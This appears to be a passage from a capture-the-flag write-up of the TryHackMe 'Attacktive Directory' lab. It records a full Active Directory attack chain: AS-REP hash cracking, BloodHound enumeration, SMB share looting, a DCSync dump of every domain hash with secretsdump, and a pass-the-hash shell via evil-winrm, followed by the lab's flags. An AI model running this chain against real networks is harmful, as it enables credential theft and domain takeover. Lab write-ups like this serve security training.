        [-] User Paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User DARKSTAR@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User ori@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User ROBIN@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set

>hashcat -m 7500 hash ./password_list.txt //failed not sure why! John to the rescue! (next step)
        hashcat (v6.1.1-66-g6a419d06) starting...

        * Device #2: Outdated POCL OpenCL driver detected!

        This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
        You can use --force to override this, but do not report related errors.

        OpenCL API (OpenCL 2.0 LINUX) - Platform #1 [Intel(R) Corporation]
        ==================================================================
        * Device #1: Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz, 3878/3942 MB (985 MB allocatable), 2MCU

        OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
        ===========================================================================================================================
        * Device #2: pthread-Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz, skipped

        Minimum password length supported by kernel: 0
        Maximum password length supported by kernel: 256

        Hashfile 'hash' on line 1 ($krb5a...113910222aae9b7ab402f2d82a2a98cd): Separator unmatched
        No hashes loaded.

        Started: Sat Feb 20 09:17:51 2021
        Stopped: Sat Feb 20 09:17:51 2021

>john hash --wordlist=./password_list.txt
>john --show ./hash
        $krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:management2005

>pip install bloodhound
>bloodhound-python -v -u svc-admin -p management2005 -ns 10.10.93.200 -d spookysec.local -gc attacktivedirectory.spookysec.local -c all
        DEBUG: Authentication: username/password
        DEBUG: Resolved collection methods: rdp, localadmin, group, trusts, dcom, objectprops, acl, session, psremote
        DEBUG: Using DNS to retrieve domain information
        DEBUG: Querying domain controller information from DNS
        DEBUG: Using domain hint: spookysec.local
        INFO: Found AD domain: spookysec.local
        DEBUG: Found primary DC: attacktivedirectory.spookysec.local
        DEBUG: Found Global Catalog server: attacktivedirectory.spookysec.local
        DEBUG: Using LDAP server: attacktivedirectory.spookysec.local
        DEBUG: Using base DN: DC=spookysec,DC=local
        INFO: Connecting to LDAP server: attacktivedirectory.spookysec.local
        DEBUG: Authenticating to LDAP server
        DEBUG: No LAPS attributes found in schema
        INFO: Found 1 domains
        INFO: Found 1 domains in the forest
        INFO: Found 1 computers
        DEBUG: Writing users to file: users.json
        INFO: Connecting to LDAP server: attacktivedirectory.spookysec.local
        DEBUG: Authenticating to LDAP server
        DEBUG: Querying resolver LDAP for SID S-1-5-21-3591857110-2884097990-301047963-512
        DEBUG: Querying resolver LDAP for SID S-1-5-21-3591857110-2884097990-301047963-519
        DEBUG: Querying resolver LDAP for SID S-1-5-21-3591857110-2884097990-301047963-1118
        INFO: Found 17 users
        DEBUG: Finished writing users
        DEBUG: Writing groups to file: groups.json
        DEBUG: Querying resolver LDAP for DN CN=Group Policy Creator Owners,CN=Users,DC=spookysec,DC=local
        DEBUG: Querying resolver LDAP for DN CN=Domain Admins,CN=Users,DC=spookysec,DC=local
        DEBUG: Querying resolver LDAP for DN CN=Cert Publishers,CN=Users,DC=spookysec,DC=local
        DEBUG: Querying resolver LDAP for DN CN=Enterprise Admins,CN=Users,DC=spookysec,DC=local
        DEBUG: Querying resolver LDAP for DN CN=Schema Admins,CN=Users,DC=spookysec,DC=local
        DEBUG: Querying resolver LDAP for DN CN=Domain Controllers,CN=Users,DC=spookysec,DC=local
        DEBUG: Querying resolver LDAP for DN CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=spookysec,DC=local
        DEBUG: Querying resolver LDAP for DN CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=spookysec,DC=local
        DEBUG: Querying resolver LDAP for DN CN=S-1-5-17,CN=ForeignSecurityPrincipals,DC=spookysec,DC=local
        DEBUG: Querying resolver LDAP for DN CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=spookysec,DC=local
        INFO: Found 53 groups
        DEBUG: Finished writing groups
        DEBUG: Opening file for writing: domains.json
        DEBUG: Don't care about acetype 1
        DEBUG: Querying resolver LDAP for SID S-1-5-21-3591857110-2884097990-301047963-498
        DEBUG: Querying resolver LDAP for SID S-1-5-21-3591857110-2884097990-301047963-516
        INFO: Found 0 trusts
        DEBUG: Finished writing domain info
        INFO: Starting computer enumeration with 10 workers
        DEBUG: Start working
        DEBUG: Start working
        DEBUG: Start working
        DEBUG: Start working
        DEBUG: Start working
        DEBUG: Start working
        DEBUG: Start working
        DEBUG: Start working
        DEBUG: Start working
        DEBUG: Start working
        INFO: Querying computer: AttacktiveDirectory.spookysec.local
        DEBUG: Querying computer: AttacktiveDirectory.spookysec.local
        DEBUG: Resolved: 10.10.93.200
        DEBUG: Trying connecting to computer: AttacktiveDirectory.spookysec.local
        DEBUG: DCE/RPC binding: ncacn_np:10.10.93.200[\PIPE\srvsvc]
        INFO: Ignoring host AttacktiveDirectory.spookysec.local since its reported name ATTACKTIVEDIREC does not match
        DEBUG: Skipping connection because of previous failure
        DEBUG: Skipping connection because of previous failure
        DEBUG: Skipping connection because of previous failure
        DEBUG: Skipping connection because of previous failure
        DEBUG: Write worker obtained a None value, exiting
        DEBUG: Write worker is done, closing files
        INFO: Done in 00M 00S

//bloodhound is awsome https://bloodhound.readthedocs.io/en/latest/
//The backup user is a high value target and has enough permissions to allow us DCSync

>find / -type f -name 'smbmap.py'
        /opt/smbmap/smbmap.py

>python3 smbmap.py -H 10.10.144.202 -u svc-admin -p management2005 -r
            ________  ___      ___  _______   ___      ___       __         _______
        /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
        (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
        \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
            __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
        /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
        (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
        -----------------------------------------------------------------------------
            SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com   
                            https://github.com/ShawnDEvans/smbmap

                                                                                                            
        [+] IP: 10.10.144.202:445	Name: ip-10-10-144-202.eu-west-1.compute.internal	Status: Authenticated
                Disk                                                  	Permissions	Comment
            ----                                                  	-----------	-------
            ADMIN$                                            	NO ACCESS	Remote Admin
            backup                                            	READ ONLY	
            .\backup\\*
            dr--r--r--                0 Sat Apr  4 20:08:39 2020	.
            dr--r--r--                0 Sat Apr  4 20:08:39 2020	..
            fr--r--r--               48 Sat Apr  4 20:08:53 2020	backup_credentials.txt
            C$                                                	NO ACCESS	Default share
            IPC$                                              	READ ONLY	Remote IPC
            .\IPC$\\*
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	InitShutdown
            fr--r--r--                4 Sun Dec 31 23:58:45 1600	lsass
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	ntsvcs
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	scerpc
            fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-3e8-0
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	epmapper
            fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-294-0
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	LSM_API_service
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	eventlog
            fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-41c-0
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	TermSrv_API_service
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	Ctx_WinStation_API_service
            fr--r--r--                4 Sun Dec 31 23:58:45 1600	wkssvc
            fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-310-0
            fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-310-1
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	atsvc
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	SessEnvPublicRpc
            fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-370-0
            fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-730-0
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	RpcProxy\49675
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	fce673c1a615981d
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	RpcProxy\593
            fr--r--r--                4 Sun Dec 31 23:58:45 1600	srvsvc
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	spoolss
            fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-91c-0
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	netdfs
            fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-300-0
            fr--r--r--                3 Sun Dec 31 23:58:45 1600	W32TIME_ALT
            fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-978-0
            fr--r--r--                1 Sun Dec 31 23:58:45 1600	PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
            fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-a08-0
            NETLOGON                                          	READ ONLY	Logon server share 
            .\NETLOGON\\*
            dr--r--r--                0 Sat Apr  4 19:39:35 2020	.
            dr--r--r--                0 Sat Apr  4 19:39:35 2020	..
            SYSVOL                                            	READ ONLY	Logon server share 
            .\SYSVOL\\*
            dr--r--r--                0 Sat Apr  4 19:39:35 2020	.
            dr--r--r--                0 Sat Apr  4 19:39:35 2020	..
            dr--r--r--                0 Sat Apr  4 19:39:35 2020	spookysec.local

>python3 smbmap.py -H 10.10.144.202 -u svc-admin -p management2005 --download 'backup\backup_credentials.txt'
>cat backup_credentials.txt
    YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

>echo YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw | base64 --decode
        backup@spookysec.local:backup2517860r

>find / -type f -name 'secretsdump.py'
        /opt/impacket/impacket/examples/secretsdump.py

>python3 /opt/impacket/examples/secretsdump.py spookeysec.local/backup:backup2517860@10.10.144.202
        Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

        [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
        [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
        [*] Using the DRSUAPI method to get NTDS.DIT secrets
        Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
        krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
        spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
        spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
        spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
        spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
        spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
        spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
        spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
        spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
        spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
        spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
        spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
        spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
        spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
        spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
        ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:57343d0d944dd0622a592ec8fd4daff0:::
        [*] Kerberos keys grabbed
        Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
        Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
        Administrator:des-cbc-md5:2079ce0e5df189ad
        krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
        krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
        krbtgt:des-cbc-md5:b94f97e97fabbf5d
        spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
        spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
        spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
        spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
        spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
        spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
        spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
        spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
        spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
        spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
        spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
        spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
        spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
        spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
        spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
        spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
        spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
        spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
        spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
        spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
        spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
        spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
        spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
        spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
        spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
        spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
        spookysec.local\paradox:des-cbc-md5:83988983f8b34019
        spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
        spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
        spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
        spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
        spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
        spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
        spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
        spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
        spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
        spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
        spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
        spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
        spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
        spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
        spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
        ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:079e2de062c37a05178a57b9b3015e24adc154a1475b4ca468b8eeb0134d7104
        ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:13d61b56ab63bcaabefc785d5c8657a2
        ATTACKTIVEDIREC$:des-cbc-md5:6e3d5d07b95d0845
        [*] Cleaning up... 


>evil-winrm -i 10.10.144.202 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

        Evil-WinRM shell v2.3

        Info: Establishing connection to remote endpoint

        *Evil-WinRM* PS C:\Users\Administrator\Documents>

        TryHackMe{K3rb3r0s_Pr3_4uth}
        TryHackMe{B4ckM3UpSc0tty!}
        TryHackMe{4ctiveD1rectoryM4st3r}


Tools:
https://nmap.org/
https://tools.kali.org/information-gathering/enum4linux
https://github.com/ropnop/kerbrute
https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py
https://github.com/hashcat/hashcat
https://tools.kali.org/password-attacks/john
https://github.com/fox-it/BloodHound.py
https://github.com/ShawnDEvans/smbmap
https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
https://github.com/Hackplayers/evil-winrm

Links:
https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
https://bloodhound.readthedocs.io/en/latest/
https://www.secureauth.com/labs/open-source-tools/impacket/
https://github.com/SecureAuthCorp/impacket
